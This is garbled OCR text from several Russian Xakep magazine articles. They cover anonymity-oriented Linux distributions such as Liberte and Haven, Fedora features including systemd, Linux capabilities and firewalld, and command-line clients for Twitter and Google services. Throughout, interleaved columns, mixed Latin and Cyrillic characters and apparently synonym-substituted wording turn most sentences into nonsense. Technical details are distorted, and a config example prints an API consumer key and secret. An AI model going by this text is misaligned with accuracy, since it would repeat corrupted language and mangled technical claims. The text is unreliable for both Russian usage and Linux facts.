сайтовые требования равно распоряжаться ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог да околесица не считая

Некоторые дистрибутивы равным образом включают во себя общеизвестный орудие Аiгсгасk-пg

позиция точки для экране. Все приложения

для того исследования Wi-Fi-ceтeй равно генераторы

собраны не без; использованием инструментария

паролей, устойчивых ко подбору [например,

Haгdened Geпtoo , предназначенного к сборки

хитры х методов про защиты личны х данных .

PWGeп на Tailsl. Для безопасной переписки из по­

проекта. Этот инструментарий охватывает та для ие

Водан изо них- сие бл ок ировка экрана от помо­

мощью

патчи, наравне SSP [защита ото переполнен равно автор этих строк не без; тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

да буфера! равным образом ASLR [рандомизация распределе­ ния памяти!.

Чтобы хакер отнюдь не пелена обвести блокира-

X-chat

используется пополнение

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку сквозь Тог. В арсенале Libeгte Liпux вдобавок нет переводу менед­

безграмотный со х раняется!. В L i beгte Liпu x вот и все глотать небольшую толику

Но одной блокировки тута откровенно малоубедительно . тор от п относительно мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

симпатия

запрещена во настройках сервера. На промежуток времени

жер управления батман ролями Figaгo's Passwoгd

В этом разделе пишущий эти строки хотел бы разгласить о во всех отношениях

лока в свой черед отключаются системные Linuх­

Manageг 0 [ l s . гegпet . cz/fpm2 /l , кто шифрует

интересном равно полезном, ась? отнюдь не вошло на пред­

комбинации

всё-таки сохраненные пользователем парали вместе с помо­

ыдущие разделы. В основном сие неодинаковые

хотя уложить Х-сервер иначе говоря перезагрузить машину.

щью алгоритма

трюки равным образом просто-напросто занимательные решения,

Вторая чип Libeгte- зто круглым счетом называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, каковой использует­

заключается на наличии экранной клавиатуры

вов. Одна с интересных особенностей На v еп

ся в целях регистрации во точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается во том, в чем дело? симпатия безвыгодный настраивает подсак

работает почти управлением выделенного

ется на обхода кейлогерров, внедренных

автоматически. Предполагается, который разве

пользователя, имеющего минимальные компетенция

во база сиречь на какие-либо библиотеки времени

пользователю вентерь безграмотный нужна, ведь кризис миновал полно­

доступа, а вот и все имеет собственные взгляды на жизнь

AES-256 . Интересная

особен­

ность почитай всех безопасных дистрибутивов

SysRq,

со через которых мож­

исполнения . Фишка тута на том, что, на крест

стью освободить его ото всех возможных проблем.

на iptaЫes, разрешающие коннекты токмо

через хардварной клавиатуры, нажатия клавиш

После того во вкусе абонент убедится во рабо­

сверху определенные брюки веб-регистрации.

которой перетянуть элементарнее простого, экран­

тоспособности демона Тог, гражданское состояние которого ука­

ная мануал управляется мышью, которую

зывает знамя на трее, возлюбленный сможет самостоятель­

бесплодно перехватывать- получишь всего

а пустить козни [то бишь NetwoгkManageгl

кого диска равным образом памяти закачаешься период установки или — или

от через каталог Applicatioпs

завершения работы. Например, устройство,

Вторая занятная материал в -

V1daL 0a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 001 0

Hide

Tor

держи которое происходит установка, без остатка

чие без остатка работоспособного комплекса

зачищается посредством забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox равным образом демона Тог! ради Windows. Ты на лю-

пользу кого того, дай тебе снять пахта предыдущей

битва пора можешь перевести его на эдак

установки другими словами всегда сдавить конфиденци­

называемый облыжный раздел флешки [про него читай изумительный врезке! вместе с через одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные показатели . Для защиты через атак вроде

Toolsl, изобразить флешку другу, равным образом возлюбленный как и станет анонимусом. Haven легко и просто учредить получи другую

памяти сохраняется единаче малость секунд/

флешку от через встроенного инсталлятора.

выключением.

нулями либо случайными данными. Это нужно

Cold boot, возможных по причине тому, сколько после выключения комок движение извещение на оперативной минут, парамнезия сполна затирается преддверие

Просто воткни брелочек во либерал USВ-порт, выбери на список глава

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, равно дистрибутив скопируется

Собственно, в этом не запрещается да закончить. Мы

в флешку. Естественно, безо твоих личных

рассмотрели подавляющая технологий, ис­

настроек равным образом данных. Кстати, по части дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют порядочно методов зачистки жест­

Haven

пользуемых на дистрибутивах для того анонимусов .

подключает однако съемные носители во режиме

Теперь тебе решать- учредить какой-либо

<<только чтение>>, почто позволяет малозаметно

изо описанных на статье дистрибутивов иначе говоря при­

просматривать чужие файлы [время доступа

менить отдельные методики нате своем компе. ::х::

007


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П по части не без; ледние верс ии д равным образом стр да бут равным образом ва Fedo г a выделяютс я неск по части л ь кими равно нтересными равно безусловно ж е равно н н ова ци онным равным образом

направление е н е ни ям равно . Fedoгa

Syste md,

во Fedoгa

04 переш л а получай от равным образом стему равно н равным образом циал равно зации 15 SETUID-б ит на приложениях з амен е н

т ехнолог да е й CapaЬil i t i es , на шес тн адцато м рел равным образом зе о будучи не без; твлен пересадка получи загрузчик

HAL.

GRUB2

да убрана теория

Разработчики вдобавок приняли решен равным образом е на будуще м

пере вместе с мотр е ть струк т уру катало г ов, которая почитай никак не менялась

со времен

UNIX. Ра бочи й табльдот

a..W.il!l$1•1

В конце концов настойчивость разработчиков

С т андартная не без; равно вместе с положение ини ц иализации

лопну л что до , равно они создали систему инициализа ­

вплоть до от тавшаяся «пингвину » на

ции

SysV, наследство ото UNIX,

Systemd, которая

решила совершенно проблемы

Fedora бери основе Gnome 0

-и всё, построение во опаснос т равным образом . А всё потому, зачем

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны токмо д ля того , чт что касается бы

постоянно обладала недостатком, порожденным

с налету . Она стала надзирать последова­

учреждать сырые IRAWI со кеты . И малограмотный имеет важное значение , аюшки?

ее но простотой . Она позволяла стартовать

тельность запуска сервисов равно равно х совершение

piпg всеми средствами пытается локализировать

комбинация системных сервисов закачаешься срок загрузки

да ажно позволила отчураться через громоздких

период использования повышенных прав, ве­

равно венчать их закачаешься сезон шатдауна, да никак не имела

скриптов, предоставив встроенные ресурсы

роятно вместе с ть ошибки- фокус непредсказуемая ,

никакихсредств д ля а д еква т же г оконтроля

для того подготовки сервисов для запуску. При этом

тем паче который на волоску слабит неграмотный только лишь piпg,

их исполнения. В результате разработчикам

первых двух целей хуй алось долететь огульно -

а равно

прихо д илось равным образом д ти держи различ н ые ухищрения ,

ма ори г иналь н ым равным образом насчёт д новременно п ростым

сложных да жадных вплоть до гооt- п рав. Как убавить

ч тобы посчитаться затем д овател ь шнобель т ь вслед п уска

со п особом, а име нн в отношении п у т ем заб л аго на реме нн что касается г относительно

риски на этой ситуа ц ии? Ис п относительно л ьзоват ь S EL iпux?

сих самых сервисов , относительно пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно от уче т ом т касательно г о, ч т что до

ОС равно контролирова т ь ис п в отношении лн е н ие демонов,

Systemd

кайфовый ш ла на F edoгa

04

во качес т ве

ftp

равным образом громада других софтин, неизмеримо побольше

многие пользователи далеко не понимают равным образом имеют

которые имеют черточка п ерио д ически п адать

опции, же поуже для сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а малограмотный х ватки ресурсов, ОоS-атак равным образом ошибок

лась на ста нд ар т ную систему запуска/контроля

безвыгодный имеющим прав гооt, организовывать RАW-сокеты

на коде . Появилась разрозне н ная яруча сложных

сервисов. Е е подо д ержка была сызнова хлеще рас­

да привилегированные порты? Е ще большая

ширена во Fedoгa 06lбыли переписаны мно г ие устаревшие скрипты инициализации!.

дырка во безопасности . Ах ну да , у нас но очищать шту­

скриптое инициализации, кстати вызываю­

суп х множе от тво подсобных утилит может статься

gгер ,

awk

cut,

равным образом им подобных. Она аспидски несомненно ру­

шилась подле малейшей модификации. В общем,

ковина почти названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это режим

деле­

гирования повышенных прав «по кусочкам » ,

элементарность породила секрет , которая вместе с года­

Ис п олняемые файлы от SЕ Т UIО-битом- проклятье

своего рода подобие

ми всё пуще росла равным образом мешала .

всех н иксов. Н ай д ут на каком-нибудь piпg д ыру

ко, слушание малограмотный полными, а пора т равно ч ными власть ми

008

SETUID,

получи д еляющий , одна­

ХАКЕР

03/158/20 02


Федорина победа

гооt, например, позволяющий основывать RАW­

fedora

0

сокеты другими словами определять привязку для приви­

легированным портам. Благодаря CapaЬilities,

ping'y не запрещается отдать карт-бланш только лишь в создание в нем дыру, возлюбленный никак не получит ничего, за исключением

.. . да,

компетенция держи генерация RАW-сокетов. Какая досада, не быль ли?· Первоначально аппарат CapaЬilities поя­ вился в таком случае ли в включен на

HP-UX, в таком случае ли во AIX. Он сейчас давно стандарт POSIX, да и то относительно нем ни одна душа

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, равным образом пусть даже разве слесарь найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

об ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы во ядре

Linux 0.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

малограмотный вспоминал, доколе безграмотный появилась шанс

регулировать привилегиями из через атрибутов

0

Fedora держи

• ам"

Графический орган уnравления Systemd

Установка

разделов или, почто сызнова круче, Ыгf-снапшотов.

ко твердотельным накопителям !запись на ФС всегда производится во режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

в целях реализации во следующих версиях Fedoгa,

привыкшие ко миру равно сnокойствию равным образом радею­

вание nри записи!, а да имеет встроенную

заключается во реорганизации каталоговой

щие вслед оберегание традиций, выеказались

поддержку онлайн-снапшотов, в чем дело? позволяет

структуры, почитай малограмотный менявшейся со времен

напротив этой идеи, подкрепив домашние пустословие тем,

на все эквивалентно кто минута образовать рентгенограмма текущего

UNIX. Эта

что, дескать, кушать эталон

состояния ФС да откатить ее для предыдущему со­

соображение состоит во том, чтоб пере­

LSB

равным образом ась? придет­

местить по сию пору исполняемые файлы на /usг/Ьin, отказавшись, таким образом, ото каталогов /Ьin, /sЬin, /usг/sЬin, а тоже с каталога /lib, всё со­

ся заключать сделку вместе с разработчиками софта

стоянию. В Fedoгa

равным образом другими дистрибутивостроителями, вследствие чего

кули

планы на будущее реализации описанной идеи ноне

ным подходом для формированию карта загрузки

держимое которого планируется nеренести на

до сейте поры туманны.

IGRUB непосредственно находитустановленные ОС/ядра

GRUB2,

06

произошел превращение возьми за­

отличающийся интеллектуаль­

равно добавляет их во список!, солидаризирующийся

/usг/lib . Нововведение сие неграмотный лишь только да безвыгодный столь­ ко косметическое, как в глубину практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело во том, что, по мнению мнению разработчиков

В 05-ю версию Fedoгa был добавлен дворовик

ческим интерфейсом. Из системы вдобавок была

дистрибутива, /Ьin, /sЬin да /lib поуже издавна по­

fiгewalld, позволяющий заменять инструкция па­

тотально удалена свиль

теряли частный соль что каталоги пользу кого хранения

кетного фильтра возьми лету, минуя перезагрузки всех

Abstгaction Layeгl, заместо которой об эту пору ис­

базовой системы, которая может составлять загруже­

правил да разрыва сетевых соединений. Так

пользуется

на, аж когда каталога /usг кто в отсутствии для месте lв ста­

как бы пользу кого управления демоном служит отчёт

предназначенными с целью управления дисковыми

рые период его было приличествовавший включать

со через NFSI. В в таком случае а минута перемещение всех системных файлов на /usг позволит разбудить

0-BUS,

им может использовать в своих целях что придется при­

равным образом обладающий полноценным графи­

udev объединенно

не без;

HAL IHaгdwaгe

udisks

равно upoweг,

накопителями lв томишко числе равно ради выполнения

ложение от соответствующими полномочиями.

автомонтированияl равным образом контроля питания. За счисление

Для уnравления демоном изо командной строки

удаления

предусмотрена обслуживающая программа fiгewall-cmd, со по­

ки системы равным образом ее реагирования в подсоединение

трюки, как, например, погрузка разных версий

мощью которой дозволительно корпеть от правилам и,

внешних устройств.

системы со через монтирования разных /usг-

отталкиваясь с имен служб, а безграмотный IР-адресов

паче гибкую систему, с намерением производить такие

HAL посчастливилось

устранить миг загруз­

Fedoгa 06теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную пользу кого заnу­

равно номеров портов:

ска приложений во изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 0 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 0 CAP_NET_BIND_SERVICE 00 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В различие с

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая обслуживающая программа

может пустить в дело пользу кого формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, пример контейнеры

LXC

иначе виртуальную машину QEMU/ViгtuaiBox. Дистрибутив пока что поддерживаеттех­

В комплекте не без; пирушка но Fedoгa пределенная файловая

05 соглашаться рас­ система CloudFS, пред­

ставляющая из себя расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую стабильность ядра равно си­

стемных компонентов умереть и малограмотный встать период загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена для того развертывания распределенных фай­

с различных руткитов да другого вредоносного

ловых систем.

CloudFS

работает на пространстве

пользователя, посему может взяться подумаешь

ПО, внедряемого сам на стержень ОС. Для реализации технологии во систему был до­

установлена на других Linuх-дистрибутивах про

бавлен каждому свой модуль, вызываемый вновь

создания гетерогенного кластера.

давно загрузки ядра, но дьявол бесполезен без участия

В Fedoгa

05 опять же

изменилась конфигурация име­

нования сетевых интерфейсов, которая в настоящий момент

соответствующей аппаратной поддержки . Также реализована налаженность проброса

выглядит следующим образом: встроенным

USВ-устройств держи удаленные машины, которая

на материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, посещение для wеЬ­

сетевым адаптерам присваиваются имена

камере от новый машины. Система работает

em1, em2

равно т. д., если на то пошло в духе платы, подключаемые

не без; помощью где

emO,

PCI,

0- стриптиз

получают имена вида

РС I -слота, а

pci1#2,

0- сетный

порт.

нате основе интегрированного на Fedoгa токола удаленного доступа ной механизмы

QEMU.

Spice

04 про­

да виртуаль­

П роброс nроисходит на двушник

Начиная не без; 05-й версии, Fedoгa дозволено устано­

этапа : на первых порах получи виртуальную машину, а а там

свивать получай файловую систему Ыгfs средствами

сверху удаленную, идеже осуществляется оборотная

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств для реальную

какой производительностью равно дружелюбностью

машину. :::к:

009


UNIXOID

благородный Зобнин

впредь до небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все автор медленно, хотя вы правы переходим ко работе закачаешься Всемирной паутине, забывая

привычные настольные приложения. Современный круг немыслим безо

YouTube, GDocs

Gmail,

да огромного количества веб-сервисов, заменяющих нам обычные

программы . Но приблизительно ли нужен веб-браузер, чтоб наслаждаться «облачными» приложениями?

до самого <<облако во >> с командной строки да nре­ дол ж нате

вратим файловую систему на сбруя про

ыть операционная сис т ема,

без остатка из-за вязанная для << обла ч ные » быть ­

работы вместе с <<об лаками >>.

ложения ? Такой, в качестве кого ОС-браузер, возьмем

Google

Chгome

пре не без; л в отношении вутый

05? Или, может быть, такой, Plan9, отнюдь не делающий различий

равно как

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами далеко не вечно покойно нести записки и заботы

среди л ока льными равным образом сетевыми ресурсами?

с окна веб-бра узера. Тот но Twitteг, напри­

Нет, веселей всего, возлюбленная хорэ nредставпять

мер, держи широком экране занимает пик

с лица кое-что вместе с реднее в лоне ними, в таком случае очищать опе­

nолстраницы, а извлекать отверстие Твиттера

рационку, позволяющую <<хо дить на

с браузера, nодгонять размер сего окна

.. облака">>

равным образом тем равным образом др угим из в соответствии с собом.

Подви жки на создании подобной ОС нача­

равно надзирать после тем, воеже наудачу его безграмотный за­ крыть, медленно да н еудобно. К тому а пульт управления

лись еще давненько . Те а стандартные окружения

навигации довольно меш ть . Гора здо выгодно отличается

рабочего со тола к Liпux поуже нате у чили со ь син­

nосадить Т виттер во трей, с целью в рассуждении н nоказы­

х ронизировать информация пользователя из <<об лач­

ось новые сведения на виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи изо YouTube на окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как сие сделать? Да без затей

зто сейчас до некоторой степени лет] , синтезировать информацию

на Liпu x глотать основанный энтузиастами

со веб-страниц получи и распишись трудящийся столик lвиджеты КОЕ и Google Gadgets] равно проэксплуатировать уймища

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции со веб-сервисами.

рый, п омимо Твиттера , поддерживает пока что

В э праздник ста тье автор этих строк расскажу, для ак до текущий поры паче

равным образом

распространить объем соnрикосновения веба

Fг ie ndFeed да

равно обычного Linu х-десктопа . Мы рас смо трим

сказать, бери любит еля, приблизительно как бы оно ужас тя­

масса приложений на крепостной ото ы от <<об­

желовесное равно зависит через различных Gпоmе­

лачными >> сервисам да , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

010

прибегнуть одним с Тwittег-клиентов .

Почти для того каждого п в рассуждении п улярного ве б-сер виса

nоnулярно не без; тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, приходится

Tyrs- крайне воздержанный Тwittег-клиент ради

рента

ХАКЕР

03 / 058/201 0


Дос тучаться накануне небе не без;

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 0.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 0 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . а там их

B~IIT~~o Копмроеа~ естнмn. 0

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA чем своеrо oбыLiiOI'O napotiR. дпя каждоrо 0'1Мf'10ЖеtМЯ нужно генерировать нестандартный naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео относительно narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

0

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, в надежде отнюдь не :sа.бьnъ. ко какому 01рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. об

ш аг lмs 0. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W адрес из тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 01p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

0 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

число соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем шаг место ради нawero Gооglе-приложения

Во т та ко , л е rким дв иже н равно е м рук равным образом , хорошо й не без; айт м по отношению ж однако превра ти ть на десктоп н ое п р равно полка ни е

пишущий эти строки бы порекомендовал взглянуть на сторону

интересных клиентов, во вкусе графических, эдак

ровалея держи них по причине п опу л ярности , а малограмотный лич­

Рiпо иначе говоря

равным образом консольных. П ользователи среды Gпome

н ы х прист р искусник т ий), т в отношении з д нашел ь мож н в рассуждении выд е брызгать

во любом дистрибутиве, приблизительно ч т касательно ввести их

получают безраздельно с таких клиентов во комплекте

малость инте р йес ны х возле л оже н ий. В о­

да познать на деле никак не составит труда. Осо­

не без; плеером

бого внимания равным образом заслуживает

а целей могут эксплуатировать плеер

Hotot.

И оный да противоположный доступны

TweetDeck

Totem.

Пользователи КОЕ4 с целью тех

minitube,

первых, сие множест на насчёт самых разнообразных «уведомляло к» в целях

Gmail, лучшими изо ко­ CheckGmail равным образом Gmail Notifieг.

-стильный Тwittег-клиент, какой-никакой наиболее

позволяющий просматривать, выслеживать видео

торых являются

ценят пользователи маков. Одна беда- некто

равным образом со из тавлять плей-листы. Программа далеко не за­

Обе выполняют одну простую после д ачу - сидят

требует

висит через библиотек КОЕ, оттого подойдет

на трее равным образом выво дя т известие п р равно п олуче н ии

Adobe AIR,

что такое? неприемлемо на

многих юниксоидов. Поклонники I М-клиента

равным образом приверженцам паче экзотических

переписка . П в рассуждении клику происхо д ит п ерехо д н а сайт

P i dgiп должны в обязательном порядке сконцентрировать внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние сверху Тwittег-плагин про своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ симпатия где-то равным образом называется- pidgiп-twitteг) . Это

позволяющий сыскивать равным образом просматривать видео

на награда через двух упомянутых ваша сестра ш е насчет г рам ­

пусть даже побольше способный равно удачливый вариант, не­

от через штатного МРiауег.

мок, может висе т ь никак не лишь только на трее [а точнее,

жели полноценное прибавление : всё на одном

Просто запусти youtube-vieweг, введи

вещь про К ОЕ 0

бери панели), однако да возьми рабочем сто л е равно вообще где угодно, куд а К ОЕ п эскер во насчёт л яет засу н у т ь

месте равным образом никаких лишних окон. П оклонники

розыскной запрос, равным образом получи и распишись экране появит-

рента тоже безвыгодный останутся минуя вкусного.

ся пронумерованный ведомость изо двадцати

плазмоид. Также питаться полноценные клие н твоя милость

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода гостиница

чтобы работы со начто во ой службой. Из больше всего

да Тwittег-клиентов со интерфейсом команд­

н у жн насчёт го ролика спирт сейчас же начнет

интересных мы бы отметил консольный

утнапиштим строки не в таком случае — не то пcuгses. Водан с самых

пр что касается игрываться на полноэкранном режиме.

приблизительно целиком копирующий интерфейс

простых равным образом удобных написал во всех отношениях знатный

С крипт не возбраняется воспользоваться к получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов вслед дата

sup,

Mutt.

Среди утили т команд н ой строки мож н что касается вы­

клиентела называется Ыi да может состоять исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

вслед за во из ё промежуток времени ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение для предначертанный

равным образом фильмов ['-М ' ) . Для указания предпо­

язык, равно cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду с целью указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 060р, 480р, 020р равным образом 0О ВОр соответственно). Также

Оба ахти просты на использовании равно равно д еа л ьно

маленькое чудо. придется поизвращаться

со через флага '-sub;гu' позволительно пере­

твоя милость или, например, соз д анияу во е д ом л е н ий

из ОАuth-аутентификацией, которую исполь­

ключить МРiауег сверху эксплуатация русских

от через

зует Твиттер. Для основания на разделе разра­

вместе с у бтитров. Чтобы скрипт выводил свыше

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

0

bti

Однако, с тем заварить кашу пускать в ход сие

[tw itter.com/

apps/пew ) делать нечего надергать Coпsumeг Кеу и Consumeг Secгet равным образом внести их во конфиг Ыi:

знак

'-m '. Скрипт

разрознивать скрипт t г aпslatoг, что п росто пере­

подходят пользу кого интеграции во непохожие скри п ­

notify-send:

[50 заместо 00) , используй

$ notify-send

youtube- v iewe г может случаться

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием пользу кого любителей смо­ треть коньки со

YouTube.

Найти равным образом шибануть

Команду мож н относительно п р описат ь во скри n те

$ vi -/.bti

видео со его через не запрещается ради считанные

равным образом подвесить для г орячую клави ш у alias на клю­

# Consumer key

сек у нды , а МРiауег обеспечивает неизмеримо

чить на вслед д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

больше высокое характер картинки. Скрипт

истощить единовластно с множес т ва апплетов про

# Consumer secret

особенн что до деяние у ален подле просмотре НО-видео,

отображения пого д ы во трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

вместе с которым f l аsh-проигрыватель справляется

cron [хотя, конечно, фаллос обнее

Нельзя оставит ь сверх внимания равным образом пакет ути-

плохо, а МРiауег гоняет его минус какой-либо значительной нагрузки возьми процессор. Стоит

Далее необходимо не заботиться Ыi. Он напеча­

отметить, который самочки поспешность загрузки видео

тает нате экране местожительство страницы, для которой

вот и все повышается [это испытано экспери ­

твоя милость со можешь надергать

ментальным п у тем , только из нежели связано , неяс­

PIN.

Его что поделаешь

подключить во отповедь Ьti, по прошествии ась? держи щит будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key равным образом access_tokeп_

дозволительно проэксплуатировать

secгet, которые в точности таково но придется до­

митивный nсuгsеs-интерфейс со vi- п по отношению д обным

бавить на конфиг. Далее Ыi принуждён заработать,

управлением . Однако возлюбленный имеет огромный

videotop,

имеющий при­

равно из его через не запрещается короче заниматься

недостаток: требует полной загрузки видео

сведения стойком изо командной строки.

накануне начатки просмотра . Что касается других

Для

серви со ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

в свою очередь существует изрядно

03/158/20 02

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

011


UNIXOID лит по-под названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя высшая отметка простых утилит : gls на просмотра списка документов, gcp с целью копирования по ­

веб-приложений во отдельных независимых ·

$ google calendar add \

ный для того работы от

'День,

когда-когда грунт остановилась'

браузера .

0.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила притязательный

rn.

0.Ql•l <! abs ~~ rol, позво­

ляющий обернуть веб-сайт во стандартное

'Евгений

с целью удаления равным образом перемещения документов со­

ответственно. Пользоваться по всем статьям сим добром просто да славно . Например, ради просмотра

Mozilla

вариант Pгism 01:1.

кументов вместе с локальной аппаратура равным образом сверху нее, gmkdiг для создания каталогов да утилиты gгm равно

окнах, лишенных элементов управления веб ­

десктопное вставка со своим ярлыком,

процессом управления равно прочим равным образом атрибутами

0.

Редактированиедокумента

Google Docs

до сей времени х документов изо папки «Работа» делаем

[вдефолтном редакторе, прозвание которого

таково :

отмечено во переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , что-то вскакивание подобного проекта- сие ход ко светлому будущему <<о б­ лачного >> десктопа, во котором квалифицированная

$ gls

$ google docs edit --title \

Для их экспорта во формате

PDF

столе равно з ап уск ать сверх использования веб­

возьми локаль ­

0.

н у ю машину- так:

Добавлени е н ово г в отношении альбома на

Picasa [и за­

ливка фотоотпечаток к!:

создания кас т ом ны х браузеров равным образом не без; вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео получи и распишись

YouTube:

\. ....

идеи живут равным образом дажевнекотором смысле про­

Например, нашумевший

Google

Chгome

сейчас давнёшенько имеет на своем составе уловка

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно раскрыть желательный веб-сайт, перебежать

Во сезон первого обращения ко сервису некто

ярлыки приложений ... >>, наметить полоса раз­

на место << Меню

предназначенном для того

работы из такими сервисами Гугла, в духе Bloggeг,

